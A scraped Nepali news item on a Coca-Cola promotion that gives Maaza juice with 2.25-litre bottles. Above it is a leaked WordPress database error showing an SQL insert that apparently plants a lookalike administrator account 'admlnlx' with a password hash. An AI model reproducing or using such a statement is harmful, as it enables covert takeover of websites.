WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbbZjQZzZ9k8c9AmHkcqGHgzeidIce/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-19 17:02:14', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ २९-
कोकाकोला,स्प्राइट र फ्यान्टाको २.२५ लिटरको पेट बोतल किन्दा माज्जा जुस पाइने भएको छ।कोकाकोलाले केही समयका लागि शनिबारदेखि यो योजना ल्याएको हो।
माज्जा कोकाकोलाकै आँपको स्वादको जुस हो।उपभोक्ताको सम्वन्धलार्इ निरन्तरता दिने उदेश्यले यो योजना ल्याएको कम्पनीले जनाएको छ।उपभोक्तासँगको सम्बन्धलाई निरन्तरता दिने र कोकाकोलाका विभिन्न पेय पदार्थको स्वाद उनीहरु सामु उपलब्ध गराउने दृष्टिकोणले यो रणनीतिक अभियान सुरु गरिएको हो, कम्पनीद्धारा जारी विज्ञप्तिमा उल्लेख छ।